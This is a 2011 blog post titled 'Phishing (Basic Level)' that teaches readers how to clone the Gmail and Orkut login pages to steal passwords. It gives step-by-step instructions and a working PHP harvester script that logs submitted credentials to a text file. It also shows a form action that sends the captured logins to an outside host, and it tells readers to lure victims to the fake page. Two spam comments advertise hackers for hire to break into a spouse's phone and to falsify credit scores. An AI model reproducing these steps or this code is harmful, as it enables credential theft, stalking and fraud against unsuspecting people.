Thursday, July 21, 2011

Phishing(Basic Level)

What is Phishing?

Phishing is a technique to obtain password,username or any sensetive information like Credit card details using a fake page which pretends to be a real one.


How to perform the attack?

Method-1:Directing the username and password to your email Id

1.First You need to create a fake login page.So, how to do it?
Example:-open gmail.com in your browser. In the login page Click Right mouse button and save the page.

2.You must know basic HTML to understand this step: there is a keyword "ACTION" in the HTML code, its task is to send the details of the page to a handler(script), now what we have to do is change the value of that "ACTION" in the form. Lets see how to do it.
Example:-Open the saved login page(gmail.com in our example) with Notepad->press "ctrl+f"(find mode)->type "action" keyword to find.
Now you have located the "action", change the code: inside the two immediate double quotes, replace the code with:
"http://kyrion.in/download/adjgtr.phpid=example@gmail.com&link=gmail.com"
Replace "example@gmail.com" with your email id.
note:-the "link" in the above url is used to direct the page again to gmail.com, you can change it as per your need.

3.Now try login and check if you are getting the email or not. If everything is working good, now its time to upload these login pages. To do so choose any free webhosting sites(eg:my3gb.com): create an account, go to file manager and upload all files and folder which you have saved.

4.Now give the link(say:username.my3gb.com/gmail.html) of your fake login page to the victim through email or any other way. Now its upto you how to make your victim login through your fake page(use your head).





Method-2:Storing the username and password in txt file(uploaded in website)

1.First You need to create a fake login page.So, how to do it?
Example:-open orkut.com in your browser. In the login page Click Right mouse button and save the page.

2.Now create notify.php file.(copy and paste the below code and save it with name notify.php)



notify.php
<?php
header ('Location:http://www.orkut.com ');
$file = fopen("store.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($file, $variable);
fwrite($file, "=");
fwrite($file, $value);
fwrite($file, "\r\n");
}
fwrite($file, "\r\n");
fclose($file);
exit;
?>



3.Now create an empty store.txt file.

4.Open the login page saved earlier with notepad and find "action" word(hint:press "ctrl+f"). Change the value(inside two immediate double quotes) of action to "notify.php"
i.e. after submitting the login form will be handled by notify.php which will further redirect the page to orkut.com, check the header section of the php code, you can change it as per your need.









5.Upload all files(fake login page with folder,notify.php and store.txt) to my3gb.com(or any free hosting site).

 6. Serve your fake login page link to the victim. Once the victim login through your page, the login details will be stored in "store.txt" so don't forget to check the store.txt file.


Countermeasuers:

The only possible countermeasure is just don't enter the confidential data without checking the URL of the website. There are some other phishing attacks in which URL can be spoofed so better check the certificate of the website.

2 comments:

  1. When you need a great hacker that's reliable and trustworthy and cost effective,in WORLDHACKERS79@GMAIL.COM you got the best hacker in town to hack into any devices of your choice.
    this is the only hacker that's reliable,tested and trusted,they'll deliver your work in 6hours and hack into any devices of your spouse without installing anything on the target's phone and with no physical contact on your spouse's phone.
    thanks for the good work from
    Worldhackers79@gmail.com

    ReplyDelete
  2. On behalf of my family we want to say a big thank you to Kenny Blackhat, i have been thinking on how to show my appreciation for the assistance you did offered for the credit score job... We've got 440 and was seeking credit repair on how to increase the points up to 700+ in order to live a comfy way. I saw some russian students he worked for recommendation on this forum and i contacted kenny for the hacking job, he did explain and advice on how he was gonna alter these various points. Took exactly 5 days to clearly reveal the points, and to our greatest surprise it was actually 750!...I just wanna say a big THANK YOU to you and your team Kenny Group blackhat, in case you're wondering who Kenny blackhat is, he's the real deal on any hacking job you want and related forums. I say well done kenny. kennyblackhat@hackermail. com is the mail and they do have a cell number for other communications at +1 717-388-3985 and i am Mrs Lynn Sisto. thank you again kenny Group Blackhat and may God bless deeply.

    ReplyDelete